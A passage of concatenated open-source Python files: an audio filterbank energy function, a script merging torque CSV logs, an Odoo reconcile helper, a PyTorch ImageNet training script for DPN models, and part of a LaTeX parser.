gAgc = gAgc[:,nHop-1:-1:nHop]
        assert np.abs(gAgc.shape[1]-nFrames) <= 3,'Length of sample-based gAgc input incompatible with nr. frames in STFT matrix: length/nHop must = approx nFrames.'
if gAgc.size < nFrames:
gAgc = np.concatenate((gAgc,gAgc[:,-1:]*np.ones((gAgc.shape[0],nFrames-gAgc.shape[1]))),axis=1);
gAgc = gAgc[:,0:nFrames];
elif lenAgcIn > 0 and lenAgcIn < nFrames:
raise ValueError('Length of gAgc input incompatible with number of frames in STFT matrix: length must be >= nr. frames.')
    # compute root-sum-squared FFT magnitudes per channel
engy = np.zeros((nChan,nFrames))
currentBin = startBin;
for iChan in np.arange(nChan):
currBinIdx = np.arange(currentBin,currentBin+nBinLims[iChan])
engy[iChan,:] = np.sum(np.abs(X[currBinIdx,:])**2,axis=0)
currentBin +=nBinLims[iChan]
engy = np.sqrt(engy)
# compensate AGC gain, if applicable
if lenAgcIn > 0:
if par['gainDomain'].lower() == 'linear' or par['gainDomain'].lower() == 'lin':
pass
elif par['gainDomain'].lower() == 'log' or par['gainDomain'].lower() == 'log2':
gAgc = 2**(gAgc/2);
elif par['gainDomain'].lower() == 'db':
gAgc = 10**(gAgc/20);
else:
            raise ValueError("Illegal value for parameter 'gainDomain'")
gAgc = np.maximum(gAgc,np.finfo(float).eps)
engy = np.divide(engy,gAgc)
return engy
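# --- Hedged usage sketch (illustrative parameter values only) ---
# Builds a tiny synthetic STFT matrix plus a parameter dict containing the keys
# this function reads ('parent' with startBin/nBinLims/nHop, and 'gainDomain');
# the bin layout, hop size, and gain domain below are made up for the demo.
if __name__ == '__main__':
    nBinsDemo, nFramesDemo = 10, 5
    XDemo = np.random.randn(nBinsDemo, nFramesDemo) + 1j*np.random.randn(nBinsDemo, nFramesDemo)
    parDemo = {
        'parent': {'startBin': 1, 'nBinLims': np.array([3, 3, 4]), 'nHop': 20},
        'gainDomain': 'linear',
    }
    gAgcDemo = np.ones((1, nFramesDemo))    # unity frame-rate AGC gain
    engyDemo = channelEnergyFunc(parDemo, XDemo, gAgcDemo)
    print(engyDemo.shape)                   # -> (3, 5): one row per channel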
| jabeim/AB-Generic-Python-Toolbox | GpyT/Filterbank/channelEnergy.py | Python | gpl-3.0 | 2,118 |
import os
root_path = '/Users/CullenGao/LabWork/UbicompLab/data/raw/'
import pandas as pd
import numpy as np
participants = []
for root, dirs, files in os.walk(root_path):
for d in dirs:
if d[0] == 'S':
participants.append(d)
# for par in participants:
par = 'S01'
print par
write_path = '/Users/CullenGao/LabWork/UbicompLab/data/torque_participants/' + par + '.csv'
check_path = '/Users/CullenGao/LabWork/UbicompLab/data/torque_participants/check/' + par + '.csv'
times = []
flag = -1
par_path = root_path + par
for root, dirs, files in os.walk(par_path):
times = dirs
break
for time in times:
time += '/torqueLogs/'
real_path = par_path + '/' + time
for root, dirs, files in os.walk(real_path):
for f in files:
if f[-1] == 'v':
f_path = real_path + f
print f_path
file = pd.read_csv(f_path)
arr_file = np.asarray(file)
col = arr_file.shape[1]
break
new_file = np.empty((0, col + 1))
print col
headers = np.empty((0, col + 1), dtype=str)
# wr = open(write_path, 'a')
# hwr = open('/Users/CullenGao/LabWork/UbicompLab/new/check/' + par + '.csv', 'a')
times = []
par_path = root_path + par
for root, dirs, files in os.walk(par_path):
times = dirs
break
for time in times:
time += '/torqueLogs/'
real_path = par_path + '/' + time
for root, dirs, files in os.walk(real_path):
for f in files:
if f[-1] == 'v':
f_path = real_path + f
print f_path
file = pd.read_csv(f_path)
arr_file = np.asarray(file)
row, col = arr_file.shape
for r in range(row):
for c in range(col):
try:
arr_file[r][c] = float(arr_file[r][c])
except ValueError:
continue
arr_file_ = np.empty((0, col + 1))
# print col
header = np.array(file.columns.values)
header = np.hstack((header, ['flag']))
# print 'header.shape:', header.shape
headers = np.vstack((headers, header))
# print headers.shape
dele = []
for r in range(row):
if arr_file[r][2] != '-' and type(arr_file[r][2]) is not float:
headers = np.vstack((headers, np.hstack((arr_file[r], ['flag']))))
dele.append(r)
continue
# for c in range(col):
# if arr_file[r][c] == '-':
# dele.append(r)
# break
arr_file = np.delete(arr_file, dele, 0)
dele = []
for r in range(arr_file.shape[0]):
for c in range(arr_file.shape[1]):
if arr_file[r][c] == '-':
dele.append(r)
break
# print arr_file.shape, dele
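                # Rows containing a '-' placeholder act as trip separators. The loop
                # below copies each run of rows between two consecutive separators,
                # appends an incrementing 'flag' column that identifies the trip,
                # and keeps only segments of at least 31 rows.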
for r_dele in range(len(dele) - 2):
if dele[r_dele] + 1 >= dele[r_dele + 1]:
last_r_dele = r_dele + 1
continue
else:
flag += 1
tmp = arr_file[dele[r_dele] + 1 : dele[r_dele + 1]]
tmp_flag = np.ones((tmp.shape[0], 1)) * flag
tmp = np.hstack((tmp, tmp_flag))
print 'tmp.shape: ', tmp.shape
if tmp.shape[0] >= 31:
arr_file_ = np.vstack((arr_file_, tmp))
print '[AT MIDDLE] arr_file_.shape: ', arr_file_.shape, ' new_file.shape: ', new_file.shape
flag += 1
tmp = arr_file[dele[len(dele) - 1]:]
tmp_flag = np.ones((tmp.shape[0], 1)) * flag
tmp = np.hstack((tmp, tmp_flag))
if tmp.shape[0] >= 31:
arr_file_ = np.vstack((arr_file_, tmp))
print '[AT END] arr_file_.shape: ', arr_file_.shape, ' new_file.shape: ', new_file.shape
for r in range(arr_file_.shape[0]):
for c in range(arr_file_.shape[1]):
try:
arr_file_[r][c] = float(arr_file_[r][c])
except ValueError:
continue
# print arr_file
new_file = np.vstack((new_file, arr_file_))
print '[FINAL FOR ONE FILE] arr_file_.shape: ', arr_file_.shape, ' new_file.shape: ', new_file.shape
# print headers.shape
# hwr.close()
# wr.close()
new_file = np.vstack((headers[0], new_file))
np.savetxt(write_path, new_file, fmt='%s', delimiter=',')
np.savetxt(check_path, headers, fmt='%s', delimiter=',')
print headers[0]
print headers.shape
print new_file.shape, '\n'
| CullenGao/LSTM_PittsRoutine | script/cat_participants.py | Python | mit | 5,085 |
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of account_move_reconcile_helper,
# an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# account_move_reconcile_helper is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# account_move_reconcile_helper is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with account_move_reconcile_helper.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, api, fields
from openerp.osv import fields as old_fields
class AccountMoveLine(models.Model):
_inherit = 'account.move.line'
    # Currently, it isn't possible to use the new API to override reconcile_ref
    # because addons/account/wizard/account_fiscalyear_close.py uses
    # _store_set_values on reconcile_ref
# @api.one
# @api.depends('reconcile_id', 'reconcile_partial_id')
# def _get_reconcile_ref(self):
# if self.reconcile_id.id:
# self.reconcile_ref = str(self.reconcile_id.name)
# elif self.reconcile_partial_id.id:
# self.reconcile_ref = "P/" + str(self.reconcile_partial_id.name)
def _get_reconcile(self, cr, uid, ids, name, unknow_none, context=None):
res = dict.fromkeys(ids, False)
for line in self.browse(cr, uid, ids, context=context):
if line.reconcile_id:
res[line.id] = str(line.reconcile_id.name)
elif line.reconcile_partial_id:
res[line.id] = "P/" + str(line.reconcile_partial_id.name)
return res
def _get_move_from_reconcile(self, cr, uid, ids, context=None):
move = {}
for r in self.pool.get('account.move.reconcile')\
.browse(cr, uid, ids, context=context):
for line in r.line_partial_ids:
move[line.move_id.id] = True
for line in r.line_id:
move[line.move_id.id] = True
move_line_ids = []
if move:
move_line_ids = self.pool.get('account.move.line')\
.search(cr, uid, [('move_id', 'in', move.keys())],
context=context)
return move_line_ids
_columns = {
'reconcile_ref': old_fields.function(
_get_reconcile, type='char', string='Reconcile Ref',
oldname='reconcile',
store={'account.move.line': (lambda self, cr, uid, ids, c={}: ids,
['reconcile_id',
'reconcile_partial_id'], 50),
'account.move.reconcile': (_get_move_from_reconcile, None,
50)}),
}
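    # The store triggers above recompute reconcile_ref whenever reconcile_id or
    # reconcile_partial_id changes on a move line, and whenever an
    # account.move.reconcile record touches lines of the related moves
    # (via _get_move_from_reconcile), both with priority 50.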
credit_debit_balance = fields.Float(compute='compute_debit_credit_balance',
string='Balance')
# reconcile_ref = fields.Char(compute='_get_reconcile_ref', store=True)
@api.one
def compute_debit_credit_balance(self):
self.credit_debit_balance = self.debit - self.credit
| Vauxoo/account-financial-tools | account_move_reconcile_helper/models/account_move_line.py | Python | agpl-3.0 | 3,617 |
import argparse
import os
import shutil
import time
import math
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from dpn import dpns
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
model_names += dpns.keys()
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('data', metavar='DIR',
help='path to dataset')
parser.add_argument('--arch', '-a', metavar='ARCH', default='dpn92',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: dpn92)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=32, type=int,
                    metavar='N', help='mini-batch size (default: 32)')
parser.add_argument('--lr', '--learning-rate', default=math.sqrt(0.1), type=float,
metavar='LR', help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', action='store_true',
help='use pre-trained model')
best_prec1 = 0
def main():
global args, best_prec1
args = parser.parse_args()
# create model
if args.pretrained:
print("=> using pre-trained model '{}'".format(args.arch))
model = models.__dict__[args.arch](pretrained=True)
else:
print("=> creating model '{}'".format(args.arch))
if args.arch.startswith('dpn'):
model = dpns[args.arch]()
else:
model = models.__dict__[args.arch]()
if args.arch.startswith('alexnet') or args.arch.startswith('vgg'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.SGD(model.parameters(), args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
cudnn.benchmark = True
# Data loading code
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
train_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(traindir, transforms.Compose([
transforms.RandomSizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])),
batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, transforms.Compose([
transforms.Scale(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
if args.evaluate:
validate(val_loader, model, criterion)
return
for epoch in range(args.start_epoch, args.epochs):
adjust_learning_rate(optimizer, epoch)
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion)
# remember best prec@1 and save checkpoint
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'optimizer' : optimizer.state_dict(),
}, is_best)
def train(train_loader, model, criterion, optimizer, epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=top1, top5=top5))
def validate(val_loader, model, criterion):
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def adjust_learning_rate(optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.1 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == '__main__':
main()
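# --- Hedged invocation sketch (paths are illustrative) ---
# Train DPN-92 on an ImageNet-style folder that contains train/ and val/
# subdirectories laid out for torchvision.datasets.ImageFolder:
#
#     python main.py /data/imagenet -a dpn92 -b 32 -j 8 --epochs 90
#
# Evaluate an existing checkpoint on the validation split only:
#
#     python main.py /data/imagenet -a dpn92 --resume checkpoint.pth.tar -e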
| oyam/pytorch-DPNs | main.py | Python | mit | 10,273 |
# -*- coding: utf-8 -*-
# Copyright © 2014-2017 Felix Fontein
#
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Parser for LaTeX inputs."""
from __future__ import unicode_literals
from . import tree, tokenizer
import nikola.utils
import re
LOGGER = nikola.utils.get_logger('compile_latex.parser', nikola.utils.STDERR_HANDLER)
# Some constants and helper functions
class _Level(object):
Text = 10
SubSubSection = 5
SubSection = 4
Section = 3
Chapter = 2
Everything = -1
NO_LEVEL = -2
@staticmethod
def get_level(command):
if command == "chapter":
return _Level.Chapter
elif command == "section":
return _Level.Section
elif command == "subsection":
return _Level.SubSection
elif command == "subsubsection":
return _Level.SubSubSection
else:
return _Level.NO_LEVEL
@staticmethod
def create_object(level, title):
if level == _Level.SubSubSection:
return tree.SubSubSection(title)
elif level == _Level.SubSection:
return tree.SubSection(title)
elif level == _Level.Section:
return tree.Section(title)
elif level == _Level.Chapter:
return tree.Chapter(title)
raise Exception("Unknown level '{}'!".format(level))
class ParseError(Exception):
"""Represent error while parsing."""
def __init__(self, tokenstream, message, filename=None):
"""Create error in given token stream with message and optional filename."""
template = ("{2}@{0}: {1}" if filename is not None else "{0}: {1}")
super(ParseError, self).__init__(template.format(tokenstream.get_position(tokenstream.current_indices()[0]), message, filename))
class CommandInfo:
"""Represents information of a command."""
def __init__(self, command_name, argument_count, eat_trailing_whitespace, default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Create command information.
command_name: name of command;
argument_count: number of arguments;
eat_trailing_whitespace: whether to eat trailing whitespace or not;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.command_name = command_name
self.argument_count = argument_count
self.eat_trailing_whitespace = eat_trailing_whitespace
self.default_arguments = default_arguments
self.accept_unknown_commands = accept_unknown_commands
self.url_mode = url_mode
class EnvironmentInfo:
"""Represents information of an environment."""
def __init__(self, environment_name, argument_count, eat_trailing_whitespace, default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Create environment information.
environment_name: name of environment;
argument_count: number of arguments;
eat_trailing_whitespace: whether to eat trailing whitespace or not;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.environment_name = environment_name
self.argument_count = argument_count
self.eat_trailing_whitespace = eat_trailing_whitespace
self.default_arguments = default_arguments
self.accept_unknown_commands = accept_unknown_commands
self.url_mode = url_mode
# Simple string replacement commands.
_replacement_commands = {
'ldots': '\u2026',
'vdots': '\u22EE',
'cdots': '\u22EF',
}
class ParsingEnvironment(object):
"""Environmental data for parsing, like registered commands and environments."""
languages = {
'albanian': {'locale': 'sq'},
# 'amharic': {'locale': 'am'},
'arabic': {'locale': 'ar', 'right_to_left': True},
'armenian': {'locale': 'hy'},
# 'asturian': {'locale': 'ast'},
# 'bahasai': {'locale': ''},
# 'bahasam': {'locale': ''},
'basque': {'locale': 'eu'},
# 'bengali': {'locale': 'bn'},
'brazil': {'locale': 'pt-br'},
'brazilian': {'locale': 'pt-br'},
'breton': {'locale': 'br'},
'bulgarian': {'locale': 'bg'},
'catalan': {'locale': 'ca'},
# 'coptic': {'locale': 'cop'},
'croatian': {'locale': 'hr'},
'czech': {'locale': 'cs'},
'danish': {'locale': 'da'},
# 'divehi': {'locale': ''},
'dutch': {'locale': 'nl'},
'english': {'locale': 'en'},
'esperanto': {'locale': 'eo'},
'estonian': {'locale': 'et'},
'farsi': {'locale': 'fa', 'right_to_left': True},
        'finnish': {'locale': 'fi'},
'french': {'locale': 'fr'},
'friulan': {'locale': 'fur'},
'galician': {'locale': 'gl'},
'german': {'locale': 'de'},
'greek': {'locale': 'el'},
'hebrew': {'locale': 'he', 'right_to_left': True},
# 'hindi': {'locale': 'hi'},
'icelandic': {'locale': 'is'},
# 'interlingua': {'locale': ''},
'irish': {'locale': 'ga'},
'italian': {'locale': 'it'},
# 'kannada': {'locale': 'kn'},
# 'khmer': {'locale': 'km'},
# 'korean': {'locale': 'ko'},
# 'lao': {'locale': 'lo'},
'latin': {'locale': 'la'},
'latvian': {'locale': 'lv'},
'lithuanian': {'locale': 'lt'},
# 'lsorbian': {'locale': ''},
'magyar': {'locale': 'hu'},
# 'malayalam': {'locale': 'ml'},
# 'marathi': {'locale': 'mr'},
# 'nko': {'locale': ''},
'norsk': {'locale': 'nb'},
'nynorsk': {'locale': 'nn'},
'occitan': {'locale': 'oc'},
'piedmontese': {'locale': 'pms'},
'polish': {'locale': 'pl'},
'portuges': {'locale': 'pt'},
'romanian': {'locale': 'ro'},
'romansh': {'locale': 'rm'},
'russian': {'locale': 'ru'},
# 'samin': {'locale': ''},
# 'sanskrit': {'locale': 'sa'},
'scottish': {'locale': 'sco'},
'serbian': {'locale': 'sr'},
'slovak': {'locale': 'sk'},
'slovenian': {'locale': 'sl'},
'spanish': {'locale': 'es'},
'swedish': {'locale': 'sv'},
# 'syriac': {'locale': 'syc'},
# 'tamil': {'locale': 'ta'},
# 'telugu': {'locale': 'te'},
# 'thai': {'locale': 'th'},
# 'tibetan': {'locale': ''},
'turkish': {'locale': 'tr'},
'turkmen': {'locale': 'tk'},
'ukrainian': {'locale': 'uk'},
'urdu': {'locale': 'ur', 'right_to_left': True},
# 'usorbian': {'locale': ''},
# 'vietnamese': {'locale': 'vi'},
'welsh': {'locale': 'cy'},
}
def __init__(self):
"""Initialize default environment."""
self.commands = {}
self.environments = {}
self.register_command("item", 0)
self.register_command_WS("code", 1)
self.register_command_WS("textbf", 1)
self.register_command_WS("textit", 1)
self.register_command_WS("texttt", 1)
self.register_command_WS("emph", 1)
self.register_command("newpar", 0)
self.register_command("chapter", 1)
self.register_command("section", 1)
self.register_command("subsection", 1)
self.register_command("subsubsection", 1)
self.register_command_WS("href", 2, url_mode={0})
self.register_command_WS("url", 1, url_mode={0})
self.register_command_WS("label", 1)
self.register_command_WS("ref", 2, None)
self.register_command_WS("symbol", 1)
self.register_command_WS("foreignlanguage", 2)
self.register_command("qed", 0)
self.register_command("includegraphics", 2, None, accept_unknown_commands=True)
self.register_command("setlength", 2, accept_unknown_commands=True)
self.register_command("noindent", 0)
self.register_command("hline", 0)
self.register_command("cline", 1)
self.register_environment_WS("codelisting", 1)
self.register_environment("definition", 1, None)
self.register_environment("definitions", 1, None)
self.register_environment("lemma", 1, None)
self.register_environment("proposition", 1, None)
self.register_environment("theorem", 1, None)
self.register_environment("corollary", 1, None)
self.register_environment("example", 1, None)
self.register_environment("examples", 1, None)
self.register_environment("remark", 1, None)
self.register_environment("remarks", 1, None)
self.register_environment("proof", 1, None)
self.register_environment("align*", 0)
self.register_environment("align", 0)
self.register_environment("itemize", 0)
self.register_environment("enumerate", 0)
self.register_environment("tikzpicture", 1, None, accept_unknown_commands=True)
self.register_environment("pstricks", 1, accept_unknown_commands=True)
self.register_environment("blockquote", 0)
self.register_environment("center", 0)
self.register_environment("picturegroup", 0)
self.register_environment("formulalist", 1, 1)
self.register_environment("tabular", 1)
for replacement in _replacement_commands.keys():
self.register_command_WS(replacement, 0)
def register_command(self, command_name, argument_count, *default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Register a new command.
command_name: name of command;
argument_count: number of arguments;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.commands[command_name] = CommandInfo(command_name, argument_count, True, default_arguments, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode)
def register_command_WS(self, command_name, argument_count, *default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Register a new command which does not eat trailing whitespace.
command_name: name of command;
argument_count: number of arguments;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.commands[command_name] = CommandInfo(command_name, argument_count, False, default_arguments, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode)
def register_environment(self, environment_name, argument_count, *default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Register a new environment.
environment_name: name of environment;
argument_count: number of arguments;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.environments[environment_name] = EnvironmentInfo(environment_name, argument_count, True, default_arguments, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode)
def register_environment_WS(self, environment_name, argument_count, *default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Register a new environment which does not eat trailing whitespace.
environment_name: name of environment;
argument_count: number of arguments;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.environments[environment_name] = EnvironmentInfo(environment_name, argument_count, False, default_arguments, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode)
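# --- Hedged usage sketch (not part of the original module) ---
# Registering an extra command before handing a source string to the Parser;
# the command name, source text, and filename below are illustrative.
#
#     env = ParsingEnvironment()
#     env.register_command("warning", 1)     # accepts \warning{...} with one argument
#     parser = Parser(r"\section{Intro} Hello \emph{world}.", env,
#                     filename="example.tex")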
class Parser:
"""The LaTeX parser."""
def __init__(self, input, parsing_environment, filename=None):
"""Create parser from input string and parsing environment."""
self.tokens = tokenizer.TokenStream(input)
self.parsing_environment = parsing_environment
self.filename = filename
def __expect(self, token, skip=True):
if self.tokens.current_type() == token:
if skip:
self.tokens.skip_current()
else:
raise ParseError(self.tokens, "Expected {0}, but found {1}!".format(token, self.tokens.current()), filename=self.filename)
def __command_name(self, command):
if len(command) == 2:
return "\\{0}".format(command[0])
else:
return "\\{0}{{{1}}}".format(command[0], command[1])
def __flatten(self, block):
if isinstance(block, tree.Block):
while True:
if len(block.elements) == 1 and isinstance(block.elements[0], tree.Block):
if type(block) == tree.Block:
block.elements[0].labels.extend(block.labels)
block = block.elements[0]
elif type(block.elements[0]) == tree.Block:
block.labels.extend(block.elements[0].labels)
block.elements = block.elements[0].elements
else:
block.elements[0] = self.__flatten(block.elements[0])
break
else:
for i in range(len(block.elements)):
block.elements[i] = self.__flatten(block.elements[i])
break
return block
def __get_inline_code(self, code_type):
code_type = code_type.recombine_as_text()
end_token = None
end_char = None
skip_first_char = False
if self.tokens.current_type() == tokenizer.Token.CurlyBraketOpen:
end_token = tokenizer.Token.CurlyBraketClose
start = self.tokens.current_indices()[1]
elif self.tokens.current_type() == tokenizer.Token.Text:
end_char = self.tokens.current_value()[0]
skip_first_char = True
start = self.tokens.current_indices()[0] + 1
else:
raise ParseError(self.tokens, "Invalid delimiter {} for inline code!".format(self.tokens.current()), filename=self.filename)
while self.tokens.has_current():
if self.tokens.current_type() == end_token:
end = self.tokens.current_indices()[0]
self.tokens.skip_current()
break
elif (self.tokens.current_type() == tokenizer.Token.Text or self.tokens.current_type() == tokenizer.Token.EscapedText) and end_char is not None:
si = 0
if skip_first_char:
si = 1
skip_first_char = False
index = self.tokens.current_value().find(end_char, si)
if index >= si:
end = self.tokens.current_indices()[0] + index
if self.tokens.current_type() == tokenizer.Token.EscapedText:
end += 1
if index == len(self.tokens.current_value()) - 1:
self.tokens.skip_current()
else:
self.tokens.set_value(0, self.tokens.current_value()[index + 1:])
break
self.tokens.skip_current()
return tree.Code(code_type, self.tokens.get_substring(start, end))
def __get_formatting(self, command):
if len(command) == 2 and command[0] in ["emph", "textbf", "textit", "texttt"]:
if isinstance(command[1][0], tree.Words):
result = command[1][0]
else:
result = tree.Words()
if command[1][0] is not None:
result.words.append(command[1][0])
if command[0] == "emph":
result.formatting = "emphasize"
elif command[0] == "textbf":
result.formatting = "strong"
elif command[0] == "textit":
                result.formatting = "emphasize"
elif command[0] == "texttt":
result.formatting = "teletype"
return result
else:
return None
def __get_includegraphics(self, command):
url = command[1][0].recombine_as_text()
args = dict()
if command[1][1] is not None:
            for argPair in re.split(r"\s*,\s*", command[1][1].recombine_as_text().strip()):
arg = argPair.split("=")
assert len(arg) == 2
args[arg[0].strip()] = arg[1].strip()
return tree.IncludeGraphics(url, args)
def __get_tikz_picture(self, command):
start = self.tokens.current_indices()[0]
while self.tokens.has_current():
